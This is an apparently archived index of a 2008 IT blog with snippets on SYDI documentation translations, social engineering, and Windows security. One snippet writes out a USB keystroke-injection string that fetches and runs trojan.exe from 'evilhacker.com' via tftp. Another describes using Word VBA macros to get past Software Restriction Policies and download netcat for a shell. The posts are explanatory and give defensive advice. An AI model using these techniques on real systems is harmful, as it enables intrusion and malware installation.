web-archive-net.com » NET » O » OGENSTAD.NET

Total: 47

Choose link from "Titles, links and description words view":

Or switch to "Titles and links view".
  • SYDI
    network documentation SYDI German support for SYDI and the impact of translations February 12 2008 by patrick ogenstad Leave a Comment G erman has joined the ranks of languages you can use with SYDI Server The file will be included in the next version of SYDI Server Until then it is available for download through the download page Thanks to Jan Picard who has made the translation file Read more Filed Under SYDI Tagged With network documentation SYDI translations Danish Language File for SYDI Server February 5 2008 by patrick ogenstad Leave a Comment T hanks to Morten Vitved we now have a Danish language file for SYDI This means we can now translate the XML files generated by SYDI Server in seven different languages The file with be included in the next version of SYDI Server until that time you can download it as a patch from the SYDI download page Read more Filed Under SYDI Tagged With network documentation SYDI translation SYDI Server 2 1 Released January 30 2008 by patrick ogenstad Leave a Comment A round 1 5 years has passed since I released SYDI Server 2 0 and now I ve finally gotten my act together

    Original URL path: http://ogenstad.net/tag/sydi/ (2016-05-01)
    Open archived version from archive


  • How far do you trust an unknown USB Stick?
    came to be while listening to the Pilot episode of the Securabit Podcast thanks to Martin for pointing to the Podcast In this episode they talk about YubiKey The YubiKey is a USB authentication solution when you plug in the YubiKey usb device to your computer it is recognized as a USB keyboard It has one button and when pressed it enters a onetime password I won t go into any details but if you re interested you can watch a one minute video on the YubiKey site or listen to the Securabit Podcast The product got me thinking what if someone were to make a device that looks like a usb stick but in fact is a USB keyboard just like the YubiKey However instead of being programmed to enter a random password string it was made to enter a malicious string of characters For example an attacker might choose to target a Windows box with these characters windows r cmd exe enter tftp i evilhacker com GET trojan exe temp trojan exe enter temp trojan exe enter exit enter This would install a trojan on the target computer assuming the user is allowed to runt tftp simply because

    Original URL path: http://ogenstad.net/2008/09/11/how-far-do-you-trust-an-unknown-usb-stick/ (2016-05-01)
    Open archived version from archive

  • Security
    have to create the macro ourselves on the fly each time we want to run macros See the difference The security setting in Word doesn t disallow you to create and run your own macros If we would save the document and open it again then the security setting would kick in and disallow the macro If we had signed it before saving then we would be allowed to run it In order to prevent this we would have to have a setting in office called Don t Allow Users to Develop Macros VBA PrisonBreak I named the macro I created VBA PrisonBreak I must have been watching too much TV You can download the VBA PrisonBreak from here To test it in your environment open up Microsoft Word and press Alt F11 to enter the VBA editor Double click on This Document This will give you a code Window on the right side Copy the contents from the VBA PrisonBreak txt file and paste it in the Window The file contains different subroutines or programs if you will To run one of these programs you set the cursor somewhere after the Sub Program and before the End statement To execute the program you press Play or F5 To give it a try and test something harmless start the routine called RunCommand and enter ping 127 0 0 1 When the command is completed go back to the Word document If everything worked out as it should you will see which command you tried to run and the results Let s see if we can poke around a bit cmd c dir Hm this won t work unless we have command prompt scripting allowed Then again we can create scripts of our own and run them instead Another sub routine of VBA PrisonBreak is called ListFilesinFolder and takes a directory as an argument This is just a simple example but a lot can be accomplished by scripting So we haven t done anything terribly exiting The commands we can run by using the RunCommand routine depend on a few factors we will look at the Software Restriction Policies We know we can run Word but what about the default additional ones Among others this includes commands under c windows and c windows system32 net view and net user domain might be interesting and could give us some information After looking around we might come to the conclusion that we want to run a command which isn t allowed by the software restriction policy As a normal unprivileged user we will not have write access to c windows or c windows system32 so we can t place any files in those directories But in our configuration we have write access to c windows temp and even better CREATOR OWNER has Full Control If we can place a file in this directory we will be able to run it with RunCommand by entering C windows temp mycommand exe Now how would we place a file there We can t just use copy since cmd exe is blocked We might be able to use xcopy or tftp If tftp isn t available we might still be able to expand exe it from c windows i386 tftp ex There is also a function in VBA PrisonBreak which lets you download files through http HTTPDownload It takes source url and target file as arguments From here we can download netcat and gain shell access to the server Note that cmd exe is still restricted unfortunately an attacker can use another file or edit a version of cmd exe This edited shell file can then be placed under c windows temp It is important to realize that the credentials used in this shell will be that of the unprivileged user account How to Protect Yourself It s really easy to protect yourself against this feature remember this is not a vulnerability or an exploit in Windows or Word We are trying to remove features from Windows such as disabling cmd exe since the features we want to remove can be used in harmful ways When you install Office you don t have to install all the features one of these features is vba Visual Basic for Applications Without vba this prison break wouldn t be possible in the way I ve described You can find information about this in the Office Security pages However as you can see on the page Microsoft recommends that you don t disable vba and also lists the reasons why so you have to decide for yourself This page also mentions the very high macro setting but remember what I said before this setting doesn t apply in this context Another option is to disable vba through group policies You can do this by using the ADM files for Microsoft Office This is only an option if you won t be using any macros Even if your business requires you to be able to run vba I have three words for you Defense in Depth If one part of the system fails this shouldn t mean that the defense has been breached The default Software Restriction Policies obviously didn t restrict as much as we would have hoped We will definitely want to explore these settings If a user has write and execute permissions to any location within a SRP Path rule that user can run whatever he wants You could set up deny rules for these directories or you could tighten the NTFS permissions and remove execute permissions It would be nice if the default policies provided some sort of protection at least since Microsoft has written in several places that they shouldn t be changed unless you are an advanced user But the Software Restriction Policies can be fixed and in this case that s not really the problem Since we can write VBA code we have a lot of options VBA PrisonBreak is mostly a proof of concept

    Original URL path: http://ogenstad.net/category/security/ (2016-05-01)
    Open archived version from archive

  • Social Engineering
    parking lot Perhaps this would scare you enough to disable autorun throughout your domain you ve done that right Now imagine if someone gave one of your users a USB device which was connected to a workstation on your network and in turn your network was compromised How would you explain that Read more Filed Under Security Tagged With Social Engineering Social Engineering on the Train August 19 2008 by

    Original URL path: http://ogenstad.net/tag/social-engineering/ (2016-05-01)
    Open archived version from archive

  • Social Engineering on the Train
    know which the new passengers were They wouldn t bug the existing passengers who had already shown their ticket When I was a child I thought they must be superhuman that they either had fantastic memory or were absolutely brilliant at what they did Traveling on the same trains now I can see it so easily The train conductors don t ask me for my ticket anymore though they ask everyone around me I still have a monthly pass as it would go against my morals not to have a valid ticket besides I also use it to ride the bus and the subways I just find it interesting to experiment with social engineering in a harmless environment What I noticed was that when the train conductor entered the wagon all the new passengers would reach for their tickets Everyone who had already shown his ticket just ignored the train conductor In reality the train conductors aren t looking for new passengers they are looking for people who want to show their tickets or rather they are looking for people who behave in a certain way So if I just ignore them when they come they ignore me I ve also tried looking at them even having eye contact and smiling As long as I don t reach for my ticket I m safe Looking at this from a security perspective they are very poor security guards Their job is to protect the resource train ride from unauthorized use passengers who don t pay Of course taking this one step further this could be according to plan in the name of user friendliness As in don t bug and annoy users who have already shown their pass I would put my money on the former explanation In terms of social

    Original URL path: http://ogenstad.net/2008/08/19/social-engineering-on-the-train/ (2016-05-01)
    Open archived version from archive

  • Security Policy
    my blog For current updates head over to Networklore About Stories Contact Powered by Genesis Social Engineering on the Train August 19 2008 by patrick ogenstad 2 Comments D uring your childhood I m sure you experienced a lot of magic some things were just so fantastic and mind boggling you just couldn t figure it out For me one of these extraordinary events was the work of train conductors

    Original URL path: http://ogenstad.net/tag/security-policy/ (2016-05-01)
    Open archived version from archive

  • German support for SYDI and the impact of translations
    next version of SYDI Server Until then it is available for download through the download page Thanks to Jan Picard who has made the translation file So now we can translate the xml files generated by SYDI Server to eight different languages Though this is good if your organization doesn t use English as its primary language it will mean that in order to keep the SYDI Server package completely updated I will have to keep in touch with more people and involve more people each time I make a change This is one of the reasons why there weren t any new features in the core sydi server script in the 2 1 version This is not the way I want it to be i e I see having more translations as a good thing but still the rest of the project shouldn t have to suffer for it Because of this I won t cross mountains in order to get updated translation files for each language since it could delay future releases more than necessary The way I plan to solve this is to create a new package for the translations file and just release those packages more

    Original URL path: http://ogenstad.net/2008/02/12/german-support-for-sydi-and-the-impact-of-translations/ (2016-05-01)
    Open archived version from archive

  • translations
    For current updates head over to Networklore About Stories Contact Powered by Genesis German support for SYDI and the impact of translations February 12 2008 by patrick ogenstad Leave a Comment G erman has joined the ranks of languages you can use with SYDI Server The file will be included in the next version of SYDI Server Until then it is available for download through the download page Thanks to

    Original URL path: http://ogenstad.net/tag/translations/ (2016-05-01)
    Open archived version from archive